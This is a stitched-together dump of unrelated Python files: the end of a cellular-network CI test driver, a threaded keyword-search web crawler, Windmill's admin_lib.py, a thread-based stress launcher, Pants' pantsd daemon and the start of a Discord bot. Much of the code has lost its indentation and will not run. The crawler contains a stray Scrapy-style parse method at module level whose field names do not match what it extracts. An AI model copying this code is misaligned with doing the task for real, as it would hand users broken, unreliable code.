sys.exit('Insufficient Parameter')
SSH.LogCollectBuild()
elif re.match('^LogCollecteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollecteNB()
elif re.match('^LogCollectHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectHSS()
elif re.match('^LogCollectMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectMME()
elif re.match('^LogCollectSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectSPGW()
elif re.match('^LogCollectPing$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectPing()
elif re.match('^LogCollectIperf$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectIperf()
elif re.match('^LogCollectOAIUE$', mode, re.IGNORECASE):
if SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectOAIUE()
elif re.match('^InitiateHtml$', mode, re.IGNORECASE):
if (SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == ''):
Usage()
sys.exit('Insufficient Parameter')
count = 0
foundCount = 0
while (count < SSH.nbTestXMLfiles):
		xml_test_file = sys.path[0] + "/" + SSH.testXMLfiles[count]
if (os.path.isfile(xml_test_file)):
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-' + str(count)))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-' + str(count)))
SSH.htmlTabIcons.append(xmlRoot.findtext('htmlTabIcon',default='info-sign'))
foundCount += 1
count += 1
if foundCount != SSH.nbTestXMLfiles:
SSH.nbTestXMLfiles = foundCount
SSH.CreateHtmlHeader()
elif re.match('^FinalizeHtml$', mode, re.IGNORECASE):
SSH.CreateHtmlFooter(SSH.finalStatus)
elif re.match('^TesteNB$', mode, re.IGNORECASE) or re.match('^TestUE$', mode, re.IGNORECASE):
if re.match('^TesteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.ranRepository == '' or SSH.ranBranch == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '' or SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '' or SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
if (SSH.EPCIPAddress != '') and (SSH.EPCIPAddress != 'none'):
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, cwd + "/tcp_iperf_stats.awk", "/tmp")
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, cwd + "/active_net_interfaces.awk", "/tmp")
else:
if SSH.UEIPAddress == '' or SSH.ranRepository == '' or SSH.ranBranch == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == '':
Usage()
sys.exit('UE: Insufficient Parameter')
#read test_case_list.xml file
# if no parameters for XML file, use default value
if (SSH.nbTestXMLfiles != 1):
xml_test_file = cwd + "/test_case_list.xml"
else:
xml_test_file = cwd + "/" + SSH.testXMLfiles[0]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
exclusion_tests=xmlRoot.findtext('TestCaseExclusionList',default='')
requested_tests=xmlRoot.findtext('TestCaseRequestedList',default='')
if (SSH.nbTestXMLfiles == 1):
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-0'))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-0'))
repeatCount = xmlRoot.findtext('repeatCount',default='1')
SSH.repeatCounts.append(int(repeatCount))
all_tests=xmlRoot.findall('testCase')
exclusion_tests=exclusion_tests.split()
requested_tests=requested_tests.split()
#check that exclusion tests are well formatted
#(6 digits or less than 6 digits followed by +)
for test in exclusion_tests:
if (not re.match('^[0-9]{6}$', test) and
not re.match('^[0-9]{1,5}\+$', test)):
logging.debug('ERROR: exclusion test is invalidly formatted: ' + test)
sys.exit(1)
else:
logging.debug(test)
#check that requested tests are well formatted
#(6 digits or less than 6 digits followed by +)
#be verbose
for test in requested_tests:
if (re.match('^[0-9]{6}$', test) or
re.match('^[0-9]{1,5}\+$', test)):
logging.debug('INFO: test group/case requested: ' + test)
else:
logging.debug('ERROR: requested test is invalidly formatted: ' + test)
sys.exit(1)
if (SSH.EPCIPAddress != '') and (SSH.EPCIPAddress != 'none'):
SSH.CheckFlexranCtrlInstallation()
#get the list of tests to be done
todo_tests=[]
for test in requested_tests:
if (test_in_list(test, exclusion_tests)):
logging.debug('INFO: test will be skipped: ' + test)
else:
#logging.debug('INFO: test will be run: ' + test)
todo_tests.append(test)
signal.signal(signal.SIGUSR1, receive_signal)
SSH.CreateHtmlTabHeader()
cnt = 0
SSH.prematureExit = True
while cnt < SSH.repeatCounts[0] and SSH.prematureExit:
SSH.prematureExit = False
for test_case_id in todo_tests:
for test in all_tests:
id = test.get('id')
if test_case_id != id:
continue
SSH.testCase_id = id
SSH.desc = test.findtext('desc')
action = test.findtext('class')
if (CheckClassValidity(action, id) == False):
continue
SSH.ShowTestID()
GetParametersFromXML(action)
if action == 'Initialize_UE' or action == 'Attach_UE' or action == 'Detach_UE' or action == 'Ping' or action == 'Iperf' or action == 'Reboot_UE' or action == 'DataDisable_UE' or action == 'DataEnable_UE' or action == 'CheckStatusUE':
if (SSH.ADBIPAddress != 'none'):
terminate_ue_flag = False
SSH.GetAllUEDevices(terminate_ue_flag)
if action == 'Build_eNB':
SSH.BuildeNB()
elif action == 'WaitEndBuild_eNB':
SSH.WaitBuildeNBisFinished()
elif action == 'Initialize_eNB':
SSH.InitializeeNB()
elif action == 'Terminate_eNB':
SSH.TerminateeNB()
elif action == 'Initialize_UE':
SSH.InitializeUE()
elif action == 'Terminate_UE':
SSH.TerminateUE()
elif action == 'Attach_UE':
SSH.AttachUE()
elif action == 'Detach_UE':
SSH.DetachUE()
elif action == 'DataDisable_UE':
SSH.DataDisableUE()
elif action == 'DataEnable_UE':
SSH.DataEnableUE()
elif action == 'CheckStatusUE':
SSH.CheckStatusUE()
elif action == 'Build_OAI_UE':
SSH.BuildOAIUE()
elif action == 'Initialize_OAI_UE':
SSH.InitializeOAIUE()
elif action == 'Terminate_OAI_UE':
SSH.TerminateOAIUE()
elif action == 'Initialize_CatM_module':
SSH.InitializeCatM()
elif action == 'Terminate_CatM_module':
SSH.TerminateCatM()
elif action == 'Attach_CatM_module':
SSH.AttachCatM()
elif action == 'Detach_CatM_module':
SSH.TerminateCatM()
elif action == 'Ping_CatM_module':
SSH.PingCatM()
elif action == 'Ping':
SSH.Ping()
elif action == 'Iperf':
SSH.Iperf()
elif action == 'Reboot_UE':
SSH.RebootUE()
elif action == 'Initialize_HSS':
SSH.InitializeHSS()
elif action == 'Terminate_HSS':
SSH.TerminateHSS()
elif action == 'Initialize_MME':
SSH.InitializeMME()
elif action == 'Terminate_MME':
SSH.TerminateMME()
elif action == 'Initialize_SPGW':
SSH.InitializeSPGW()
elif action == 'Terminate_SPGW':
SSH.TerminateSPGW()
elif action == 'Initialize_FlexranCtrl':
SSH.InitializeFlexranCtrl()
elif action == 'Terminate_FlexranCtrl':
SSH.TerminateFlexranCtrl()
elif action == 'IdleSleep':
SSH.IdleSleep()
elif action == 'Perform_X2_Handover':
SSH.Perform_X2_Handover()
else:
sys.exit('Invalid action')
if SSH.prematureExit:
break
if SSH.prematureExit:
break
cnt += 1
if cnt == SSH.repeatCounts[0] and SSH.prematureExit:
logging.debug('Testsuite failed ' + str(cnt) + ' time(s)')
SSH.CreateHtmlTabFooter(False)
sys.exit('Failed Scenario')
else:
logging.info('Testsuite passed after ' + str(cnt) + ' time(s)')
SSH.CreateHtmlTabFooter(True)
else:
Usage()
sys.exit('Invalid mode')
sys.exit(0)
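# --- Illustrative note (not part of the original script) --------------------
# The requested/exclusion lists validated above follow a simple convention:
# a full 6-digit ID selects a single test case, while fewer than six digits
# followed by '+' selects every case sharing that prefix.  The actual matching
# is done by test_in_list(), defined earlier in this file; a hypothetical
# re-statement of the rule looks like:
#
#     def test_id_matches(test_id, entry):
#         if entry.endswith('+'):
#             return test_id.startswith(entry[:-1])
#         return test_id == entry
#
#     # e.g. '030201' selects only test 030201, while '0302+' selects the
#     # whole 0302xx group.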
|
crawling-scrap.py
|
import urllib.request
import re
import threading
from multiprocessing import Queue
def findkeywordlvl(strwebsiteinp, strmatch, queueget):
if strmatch.startswith("src="):
strmatch = strmatch[5:len(strmatch)]
elif strmatch.startswith("href="):
strmatch = strmatch[6:len(strmatch)]
    if not (strmatch.endswith(".jpg") or strmatch.endswith(".png") or strmatch.endswith(".bmp") or strmatch.endswith(".gif")):
if strmatch.startswith("//"):
strwebsite2 = "http:" + strmatch
elif strmatch.startswith("/"):
strwebsite2 = strwebsiteinp + strmatch
else:
strwebsite2 = strmatch
if ("\\" not in strwebsite2):
try:
print(strwebsite2)
strcontent = urllib.request.urlopen(strwebsite2).read()
match2 = re.findall(re.escape(strKeyword), str(strcontent))
match3 = re.findall("href=[\'\"]http\://[A-z0-9_\-\./]+|href=[\'\"]\/[A-z0-9_\-\./]+|href=[\'\"]www[A-z0-9_\-\./]+",str(strcontent))
match3 = match3 + re.findall("src=[\'\"]http\://[A-z0-9_\-\./]+|src=[\'\"]\/[A-z0-9_\-\./]+|src=[\'\"]www[A-z0-9_\-\./]+",str(strcontent))
if match2:
strPrint = strwebsite2 + " has " + str(len(match2)) + " matches with keyword: " + strKeyword + "\n"
print(strPrint)
strFile.write(strPrint)
else:
print("No matches for:", strwebsite2)
queueget.put([strwebsite2, match3])
return [strwebsite2, match3]
except Exception as ex:
errormsg = "Exception {0} occurred. Reason:\n{1!r}"
message = errormsg.format(type(ex).__name__, ex.args)
print(message)
strFile2.write(message)
strWebsite = input("Enter website :\n")
strKeyword = input("Enter keyword to search for:\n")
intLevel = int(input("Select levels to scan. Choose 1, 2 or 3 - 3 might contain errors:\n"))
filename = strWebsite[7:len(strWebsite)] + " positives.log"
filename2 = strWebsite[7:len(strWebsite)] + " errors.log"
strFile = open(filename, 'w')
strFile2 = open(filename2, 'w')
strContent = urllib.request.urlopen(strWebsite).read()
match2 = re.findall(re.escape(strKeyword), str(strContent))
match3 = []
if match2:
strPrint = strWebsite + " has " + str(len(match2)) + " matches with keyword: " + strKeyword + "\n"
print(strPrint)
strFile.write(strPrint)
else:
print("No matches for:", strWebsite)
if intLevel == 1:
print("Finished scanning website for keywords")
elif intLevel in range(2, 4):
regex1 = r"src=[\'\"]http\://[A-z0-9_\-\./]+|src=[\'\"]\/[A-z0-9_\-\./]+|src=[\'\"]www[A-z0-9_\-\./]+"
regex2 = r"href=[\'\"]http\://[A-z0-9_\-\./]+|href=[\'\"]\/[A-z0-9_\-\./]+|href=[\'\"]www[A-z0-9_\-\./]+"
results = []
match = re.findall(re.compile(regex2), str(strContent))
matchsrc = re.findall(re.compile(regex1), str(strContent))
match = match + matchsrc
q = Queue()
threads = []
i = 0
while i < len(match):
if threading.active_count() < 10:
t = threading.Thread(target=findkeywordlvl, args =(strWebsite, match[i],q))
t.start()
threads.append(t)
i += 1
for p in threads:
p.join()
while not q.empty():
results.append(q.get_nowait())
print(results)
    if intLevel == 3:
        threads = []
        for i in range(0, len(results)):
            j = 0
            while j < len(results[i][1]):
                if threading.active_count() < 10:
                    t = threading.Thread(target=findkeywordlvl, args=(results[i][0], results[i][1][j], q))
                    t.start()
                    threads.append(t)
                    j += 1
        for p in threads:
            p.join()
else:
print("Wrong level. Try again.")
def parse(self, response):
for e in response.css('div#boxoffice>table>tbody>tr'):
yield {
'url': ''.join(e.css('td.titleColumn>a::text').extract()).strip(),
'title': ''.join(e.css('td.ratingColumn')[0].css('::text').extract()).strip(),
'description': ''.join(e.css('td.ratingColumn')[1].css('span.secondaryInfo::text').extract()).strip(),
'type': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'image': e.css('td.posterColumn img::attr(src)').extract_first(),
'city': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'state': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'how_to_appy': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'author': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
'posted_at': ''.join(e.css('td.weeksColumn::text').extract()).strip(),
}
strFile.close()
strFile2.close()
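# --- Illustrative sketch (not part of the original crawler) -----------------
# findkeywordlvl() above normalises scraped href/src values by hand
# ("//host/..." -> "http://host/...", "/path" -> site-relative, else as-is).
# The standard library offers the same normalisation; this hypothetical helper
# shows the urllib.parse.urljoin equivalent, assuming the same inputs: a base
# site URL plus a raw attribute value with its src=/href= prefix already
# stripped off.
def _absolutise_sketch(base_url, raw_link):
    from urllib.parse import urljoin
    # urljoin handles protocol-relative ("//host/x"), root-relative ("/x")
    # and already-absolute ("http://host/x") links uniformly.
    return urljoin(base_url, raw_link)
# Example: _absolutise_sketch("http://example.com", "/about")
#          -> "http://example.com/about"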
|
admin_lib.py
|
# Copyright (c) 2006-2007 Open Source Applications Foundation
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
# Copyright (c) 2009 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import windmill
from windmill import conf, server
import logging
from time import sleep
import os, sys
from datetime import datetime
from threading import Thread
import shutil
import socket
from windmill.dep import functest
functest.configure()
def process_options(argv_list):
"""Process all the command line options"""
import admin_options
admin_options.process_module(admin_options)
argv_list.pop(0)
action = None
# This might be the hairiest code in windmill :)
# We have a very specific way we need to parse arguments
# because of the way different arguments interact with each other
# 8/27/2007 Gawd this is ugly, i would love to refactor this but I've
# forgotten what it does -Mikeal
# 12/15/2007 Oh man, I'm going to add a feature to this without refactoring it.
# The issue with this code remains the same and no standard arg parsing
# module can do what we need.
for arg in argv_list:
# Grab the test url if one is given
if arg.startswith('http://') or arg.startswith('https://'):
windmill.settings['TEST_URL'] = arg
functest.registry['url'] = arg
elif arg.startswith('-'):
# Take something like -efg and set the e, f, and g options
options = arg.replace('-', '')
for option in options:
admin_options.flags_dict[option]()
else:
# Any argument not starting with - is a regular named option
value = None
            if arg.find('=') != -1:
name, value = arg.split('=')
else:
name = arg
if name in admin_options.options_dict:
processor = admin_options.options_dict[name]
if value is None:
processor()
else:
processor(value)
elif name in action_mapping:
action = action_mapping[name]
else:
print name, 'is not a windmill argument. Sticking in functest registry.'
if value is None:
value = True
functest.registry[name] = value
if action is None:
# If an action is not defined we default to running the service in the foreground
return action_mapping['runserver']
else:
return action
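# Illustrative example of the argument forms parsed above (option and flag
# names live in admin_options.py and are assumed here, not guaranteed):
#
#     windmill shell http://example.com -e mykey=myvalue
#
# 'http://example.com' becomes TEST_URL (and functest.registry['url']),
# '-e' runs the flag handler for each letter after the dash, 'shell' resolves
# through action_mapping, and an unknown name=value pair such as
# 'mykey=myvalue' is stashed in the functest registry.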
def setup_servers(console_level=logging.INFO):
"""Setup the server and return httpd and loggers"""
windmill.is_active = True
windmill.ide_is_awake = False
if len(logging.getLogger().handlers) > 0:
console_handler = logging.getLogger().handlers[0]
console_handler.setLevel(console_level)
httpd = server.make_server()
return httpd
def run_threaded(console_level=logging.INFO):
"""Run the server threaded."""
httpd = setup_servers(console_level)
httpd_thread = Thread(target=httpd.start)
getattr(httpd_thread, 'setDaemon', lambda x: x)(True)
httpd_thread.start()
while not httpd.ready:
sleep(.25)
return httpd, httpd_thread
def configure_global_settings(logging_on=True):
"""Configure that global settings for the current run"""
# This logging stuff probably shouldn't be here, it should probably be abstracted
if logging_on:
logging.getLogger().setLevel(0)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger().addHandler(console)
if os.environ.has_key('WINDMILL_CONFIG_FILE'):
local_settings = os.environ['WINDMILL_CONFIG_FILE']
else:
local_settings = None
windmill.settings = conf.configure_settings(localSettings=local_settings)
if 'controllers' not in windmill.settings:
windmill.settings['controllers'] = []
port = windmill.settings['SERVER_HTTP_PORT']
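    # Probe upward from the configured port: a successful connect() means the
    # port is already in use, so try the next one; the first refused
    # connection (socket.error) indicates a free port and ends the loop.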
while 1:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
s.close()
port += 1
except socket.error:
break
windmill.settings['SERVER_HTTP_PORT'] = port
return windmill.settings
on_ide_awake = []
def setup():
"""Setup server and shell objects"""
global shell_objects_dict
shell_objects_dict = {}
windmill.settings['shell_objects'] = shell_objects_dict
assert not windmill.settings.get('setup_has_run', False)
httpd, httpd_thread = run_threaded(windmill.settings['CONSOLE_LOG_LEVEL'])
shell_objects_dict['httpd'] = httpd
shell_objects_dict['httpd_thread'] = httpd_thread
from windmill.bin import shell_objects
if windmill.settings['CONTINUE_ON_FAILURE'] is not False:
shell_objects.jsonrpc_client.add_json_command('{"method": "commands.setOptions", "params": {"stopOnFailure" : false}}')
if windmill.settings['EXTENSIONS_DIR'] is not None:
shell_objects.load_extensions_dir(windmill.settings['EXTENSIONS_DIR'])
if windmill.settings['RUN_TEST'] is not None:
shell_objects.run_test(windmill.settings['RUN_TEST'])
if windmill.settings['LOAD_TEST'] is not None:
shell_objects.load_test(windmill.settings['LOAD_TEST'])
if windmill.settings['JAVASCRIPT_TEST_DIR']:
shell_objects.run_js_tests(windmill.settings['JAVASCRIPT_TEST_DIR'],
windmill.settings['JAVASCRIPT_TEST_FILTER'],
windmill.settings['JAVASCRIPT_TEST_PHASE'])
browser = [setting for setting in windmill.settings.keys() if setting.startswith('START_') and \
windmill.settings[setting] is True]
import shell_objects
    if len(browser) == 1:
shell_objects_dict['browser'] = getattr(shell_objects, browser[0].lower())()
for attribute in dir(shell_objects):
shell_objects_dict[attribute] = getattr(shell_objects, attribute)
shell_objects_dict['setup_has_run'] = True
return shell_objects_dict
def teardown(shell_objects):
"""Teardown the server, threads, and open browsers."""
if windmill.is_active:
windmill.is_active = False
shell_objects['clear_queue']()
for controller in windmill.settings['controllers']:
controller.stop()
del(controller)
if windmill.settings['START_FIREFOX'] and windmill.settings['MOZILLA_CREATE_NEW_PROFILE']:
shutil.rmtree(windmill.settings['MOZILLA_PROFILE'])
for directory in windmill.teardown_directories:
if os.path.isdir(directory):
shutil.rmtree(directory)
# while shell_objects['httpd_thread'].isAlive():
# try:
# shell_objects['httpd'].stop()
# except Exception, e:
# print "Exception occurred while shutting server down:"
# print e
#
# # Hacking workaround for port locking up on linux.
# if sys.platform == 'linux2':
# try:
# shell_objects['httpd'].socket.shutdown(socket.SHUT_RDWR)
# shell_objects['httpd'].socket.close()
# except: pass
shell_objects['httpd'].stop()
#shell_objects['httpd_thread'].join()
def runserver_action(shell_objects):
"""Run the server in the foreground with the options given to the command line"""
try:
        if 'runserver' in sys.argv or len(windmill.settings['controllers']) == 0:
print 'Server running...'
if windmill.settings['EXIT_ON_DONE'] and not windmill.settings['JAVASCRIPT_TEST_DIR']:
while windmill.block_exit or (
len(shell_objects['httpd'].controller_queue.queue) is not 0 ) or (
len(shell_objects['httpd'].test_resolution_suite.unresolved) is not 0 ):
sleep(.25)
elif ( windmill.settings['RUN_TEST'] ):
windmill.runserver_running = True
while windmill.runserver_running:
sleep(.25)
else:
windmill.runserver_running = True
while windmill.runserver_running:
sleep(.25)
teardown(shell_objects)
if windmill.test_has_failed:
sys.exit(1)
except KeyboardInterrupt:
teardown(shell_objects)
sys.exit(1)
def shell_action(shell_objects):
"""Start the windmill shell environment"""
windmill.in_shell = True
# If ipython is installed and we weren't given the usecode option
try:
assert not windmill.settings['USECODE']
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed()
ipshell(local_ns=shell_objects)
except:
import code
code.interact(local=shell_objects)
teardown(shell_objects)
# def wxui_action(shell_objects):
# """Start the wxPython based service GUI"""
# try:
# import wxui
# app = wxui.App(shell_objects)
# shell_objects['wxui_app'] = app
# app.MainLoop()
# teardown(shell_objects)
# except ImportError:
# print 'Failed to import wx, defaulting to the shell'
# shell_action(shell_objects)
# def tinderbox_action(shell_objects):
# """Tinderbox action for continuous integration"""
# shell_objects['jsonrpc_client'].add_json_command('{"method": "commands.setOptions", "params": {"stopOnFailure" : false}}')
#
# class ResultsProcessor(object):
# passed = 0
# failed = 0
# def success(self, test, debug):
# self.passed += 1
# def failure(self, test, debug):
# self.failed += 1
#
# result_processor = ResultsProcessor()
# shell_objects['httpd'].test_resolution_suite.result_processor = result_processor
#
# starttime = datetime.now()
# result = None
#
# if windmill.settings['RUN_TEST']:
# try:
# while ( len(shell_objects['httpd'].controller_queue.queue) is not 0 ) or (
# len(shell_objects['httpd'].test_resolution_suite.unresolved) is not 0 ):
# sleep(1)
#
# print '#TINDERBOX# Testname = FullSuite'
# print '#TINDERBOX# Time elapsed = %s' % str (datetime.now() - starttime)
#
# if result_processor.failed > 0 or result_processor.passed is 0:
# result = "FAILED"
# else:
# result = "PASSED"
#
# print '#TINDERBOX# Status = %s' % result
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
#
# except KeyboardInterrupt:
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
# else:
# try:
# while not windmill.TESTS_COMPLETED:
# sleep(1)
# except KeyboardInterrupt:
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
#
# print '#TINDERBOX# Testname = FullSuite'
# print '#TINDERBOX# Time elapsed = %s' % str (datetime.now() - starttime)
# if windmill.RESULTS['fail'] > 0 or windmill.RESULTS['pass'] is 0:
# result = "FAILED"
# else:
# result = "PASSED"
#
# print '#TINDERBOX# Status = %s' % result
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
def start_windmill():
"""Start windmill and return shell_objects"""
configure_global_settings()
shell_objects = setup()
return shell_objects
def command_line_startup():
"""Command line startup"""
windmill.stdout, windmill.stdin = sys.stdout, sys.stdin
configure_global_settings()
action = process_options(sys.argv)
shell_objects = setup()
action(shell_objects)
action_mapping = {'shell':shell_action, 'runserver':runserver_action,
'run_service':runserver_action}
|
stress.py
|
import sys, os
from threading import Thread
def stress(name):
os.system('python whole_user_test.py ' + name)
for i in range(int(sys.argv[1])):
t = Thread(target=stress, args=( ('user' + str(i),) ))
t.start()
|
pants_daemon.py
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import threading
from setproctitle import setproctitle as set_process_title
from pants.goal.run_tracker import RunTracker
from pants.logging.setup import setup_logging
from pants.pantsd.process_manager import ProcessManager
class _StreamLogger(object):
"""A sys.{stdout,stderr} replacement that pipes output to a logger."""
def __init__(self, logger, log_level):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
"""
self._logger = logger
self._log_level = log_level
def write(self, msg):
for line in msg.rstrip().splitlines():
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
class PantsDaemon(ProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
class StartupFailure(Exception): pass
class RuntimeFailure(Exception): pass
def __init__(self, build_root, work_dir, log_level, log_dir=None, services=None,
metadata_base_dir=None, reset_func=None):
"""
:param string build_root: The pants build root.
:param string work_dir: The pants work directory.
:param string log_level: The log level to use for daemon logging.
:param string log_dir: The directory to use for file-based logging via the daemon. (Optional)
:param tuple services: A tuple of PantsService instances to launch/manage. (Optional)
:param callable reset_func: Called after the daemon is forked to reset
any state inherited from the parent process. (Optional)
"""
super(PantsDaemon, self).__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
self._logger = logging.getLogger(__name__)
self._build_root = build_root
self._work_dir = work_dir
self._log_level = log_level
self._log_dir = log_dir or os.path.join(work_dir, self.name)
self._services = services or ()
self._reset_func = reset_func
self._socket_map = {}
# N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
self._kill_switch = threading.Event()
@property
def is_killed(self):
return self._kill_switch.is_set()
def set_services(self, services):
self._services = services
def set_socket_map(self, socket_map):
self._socket_map = socket_map
def shutdown(self, service_thread_map):
"""Gracefully terminate all services and kill the main PantsDaemon loop."""
for service, service_thread in service_thread_map.items():
self._logger.info('terminating pantsd service: {}'.format(service))
service.terminate()
service_thread.join()
self._logger.info('terminating pantsd')
self._kill_switch.set()
@staticmethod
def _close_fds():
"""Close pre-fork stdio streams to avoid output in the pants process that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
def _setup_logging(self, log_level):
"""Reinitialize logging post-fork to clear all handlers, file descriptors, locks etc.
This must happen first thing post-fork, before any further logging is emitted.
"""
    # Re-initialize the child's logging locks post-fork to avoid potential deadlocks if pre-fork
# threads have any locks acquired at the time of fork.
logging._lock = threading.RLock() if logging.thread else None
for handler in logging.getLogger().handlers:
handler.createLock()
# Invoke a global teardown for all logging handlers created before now.
logging.shutdown()
# Reinitialize logging for the daemon context.
setup_logging(log_level, console_stream=None, log_dir=self._log_dir, log_name=self.LOG_NAME)
# Close out pre-fork file descriptors.
self._close_fds()
# Redirect stdio to the root logger.
sys.stdout = _StreamLogger(logging.getLogger(), logging.INFO)
sys.stderr = _StreamLogger(logging.getLogger(), logging.WARN)
self._logger.debug('logging initialized')
def _setup_services(self, services):
for service in services:
self._logger.info('setting up service {}'.format(service))
service.setup()
def _run_services(self, services):
"""Service runner main loop."""
if not services:
self._logger.critical('no services to run, bailing!')
return
service_thread_map = {service: threading.Thread(target=service.run) for service in services}
# Start services.
for service, service_thread in service_thread_map.items():
self._logger.info('starting service {}'.format(service))
try:
service_thread.start()
except (RuntimeError, service.ServiceError):
self.shutdown(service_thread_map)
raise self.StartupFailure('service {} failed to start, shutting down!'.format(service))
# Monitor services.
while not self.is_killed:
for service, service_thread in service_thread_map.items():
if not service_thread.is_alive():
self.shutdown(service_thread_map)
raise self.RuntimeFailure('service failure for {}, shutting down!'.format(service))
else:
# Avoid excessive CPU utilization.
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def _run(self):
"""Synchronously run pantsd."""
# Switch log output to the daemon's log stream from here forward.
self._setup_logging(self._log_level)
self._logger.info('pantsd starting, log level is {}'.format(self._log_level))
# Purge as much state as possible from the pants run that launched us.
if self._reset_func:
self._reset_func()
# Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
set_process_title('pantsd [{}]'.format(self._build_root))
# Write service socket information to .pids.
self._write_named_sockets(self._socket_map)
# Enter the main service runner loop.
self._setup_services(self._services)
self._run_services(self._services)
def pre_fork(self):
"""Pre-fork() callback for ProcessManager.daemonize()."""
# Teardown the RunTracker's SubprocPool pre-fork.
RunTracker.global_instance().shutdown_worker_pool()
# TODO(kwlzn): This currently aborts tracking of the remainder of the pants run that launched
# pantsd.
def post_fork_child(self):
"""Post-fork() child callback for ProcessManager.daemonize()."""
self._run()
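# --- Illustrative usage sketch (not part of the original module) ------------
# A minimal construction of PantsDaemon using the constructor parameters
# documented above; the services tuple and reset_func are left empty, and the
# paths are placeholders.  Launching goes through ProcessManager.daemonize(),
# which the pre_fork/post_fork_child callbacks above are written for, so a
# caller would roughly do:
#
#     daemon = PantsDaemon(build_root='/repo', work_dir='/repo/.pants.d',
#                          log_level='info', services=())
#     daemon.set_socket_map({})
#     daemon.daemonize()  # assumed entry point; the real call site lives in
#                         # the pants launcher, not in this file.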
|
bot.py
|
import asyncio
import logging
import threading
import unicodedata
import discord
from decouple import config
from discord.utils import get
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from pyfiglet import figlet_format
from .utils import send_verify_mail
from . import xkcd
intents = discord.Intents.all()
intents.presences = False
TOKEN = config("DISCORD_TOKEN", default="")
CSUA_GUILD_ID = config("TEST_GUILD", default=784902200102354985, cast=int)
CSUA_PHILBOT_CLIENT_ID = config("BOT_ID", default=737930184837300274, cast=int)
